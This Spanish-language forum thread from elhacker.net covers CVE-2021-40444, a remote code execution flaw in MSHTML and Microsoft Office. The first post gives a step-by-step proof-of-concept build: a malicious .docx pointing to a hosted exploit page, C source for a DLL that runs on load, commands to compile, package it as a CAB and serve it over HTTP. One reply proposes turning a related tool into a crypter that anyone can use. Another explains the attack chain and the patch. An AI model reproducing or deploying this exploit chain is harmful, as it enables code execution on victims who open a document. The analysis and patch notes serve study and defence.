elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía actualizada para evitar que un ransomware ataque tu empresa


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  PoC CVE-2021-40444 MSHTML y MS Office RCE
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: PoC CVE-2021-40444 MSHTML y MS Office RCE  (Leído 6,127 veces)
BloodSharp


Desconectado Desconectado

Mensajes: 812


¡ Hiperfoco !


Ver Perfil WWW
PoC CVE-2021-40444 MSHTML y MS Office RCE
« en: 13 Septiembre 2021, 15:55 pm »

Solo válido para motivos educativos

Fuente: https://github.com/lockedbyte/CVE-2021-40444

Generando el documento .docx:

Ir a maldoc/word/_rels/document.xml.rels y editar los textos http://<HOST> con el URL del archivo exploit.html

Luego se genera el documento .docx
Código
  1. cd maldoc/ ; zip -r maldoc.docx *

Generar el archivo dll

Código
  1. #include <windows.h>
  2.  
  3. void exec(void) {
  4. system("C:\\Windows\\System32\\calc.exe");
  5. return;
  6. }
  7.  
  8. BOOL WINAPI DllMain(
  9.    HINSTANCE hinstDLL,
  10.    DWORD fdwReason,
  11.    LPVOID lpReserved )
  12. {
  13.    switch( fdwReason )
  14.    {
  15.        case DLL_PROCESS_ATTACH:
  16.           exec();
  17.           break;
  18.  
  19.        case DLL_THREAD_ATTACH:
  20.            break;
  21.  
  22.        case DLL_THREAD_DETACH:
  23.            break;
  24.  
  25.        case DLL_PROCESS_DETACH:
  26.            break;
  27.    }
  28.    return TRUE;
  29. }

Compilar:
Código
  1. i686-w64-mingw32-gcc -shared calc.c -o calc.dll

Instalar la dependencia lcab
Código
  1. sudo apt-get install lcab

Código
  1. cp calc.dll championship.inf ; mkdir gen/ ; cd gen/ ; lcab '../championship.inf' out.cab

Copiar el archivo out.cab en el directorio www/, modificar exploit.html para apuntar a http://localhost/out.cab

Ejecutar el script: patch_cab.py

Finalmente crear el servidor:

Código
  1. cd www/ ; sudo python3 -m http.server 80

Parte final

Ejecutar maldoc.docx en una Máquina virtual.



B#
« Última modificación: 13 Septiembre 2021, 15:58 pm por BloodSharp » En línea



**Aincrad**


Desconectado Desconectado

Mensajes: 682



Ver Perfil WWW
Re: PoC CVE-2021-40444 MSHTML y MS Office RCE
« Respuesta #1 en: 13 Septiembre 2021, 17:06 pm »

Genial!!, acá hay una utilidad en c# : https://github.com/mansk1es/Caboom veré si puedo mejorarlo en un crypter. para que cualquiera pueda usarlo .
En línea



el-brujo
ehn
***
Desconectado Desconectado

Mensajes: 21.637


La libertad no se suplica, se conquista


Ver Perfil WWW
Re: PoC CVE-2021-40444 MSHTML y MS Office RCE
« Respuesta #2 en: 15 Septiembre 2021, 20:26 pm »

muy interesante, lo he visto hoy publicado en HackPlayers (Vicente Motos)

Microsoft publica el parche para el 0-day de MSHTML (CVE-2021-40444)
https://www.hackplayers.com/2021/09/parche-para-cve-2021-40444-mshtml.html



    Básicamente el documento contiene un objeto MHTML OLE que es un sitio web alojado en un endpoint controlado por un atacante.
    El sitio web ejecuta código javascript ofuscado que crea una instancia de los controles ActiveX: ActiveXObjectVAR['Script']['location'] = '.cpl:../../../AppData/Local/Temp/Low/championship.inf',
    El código del sitio web obtiene y abre un archivo .cab desde el endpoint controlado por el atacante: XMLHttpRopen['call'](XMLHttpR, 'GET', 'http://127.0.0.1/test.cab', ![]). Este archivo contiene una DLL maliciosa con extensión .inf.
    El código del sitio web ejecuta el archivo.inf como un archivo del Panel de control (.cpl) utilizando la utilidad control.exe. Por ejemplo, el código del sitio web puede ejecutar el siguiente comando: control.exe .cpl: ../../../AppData/Local/Temp/championship.inf.
    La utilidad control.exe se ejecuta como un proceso secundario del proceso que aloja la aplicación de Microsoft Office que abrió el documento de Office, como winword.exe.
    El archivo DLL malicioso .inf se ejecuta en el contexto de rundll32.exe.

Ayer ya publicaron el parche oficial de Microsoft

Actualizaciones de seguridad importantes de Microsoft CVE-2021-40444
https://blog.elhacker.net/2021/09/actualizaciones-de-seguridad-productos-microsoft--chrome-adobe.html

El parche:

las barras (/) se formatearán en barras invertidas (\) contra el recorrido de la ruta; Además, el exploit de IE no puede controlar el campo "ubicación" para ejecutar código con control.exe.



Fuente:
https://twitter.com/aaaddress1/status/1438023534320619524
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines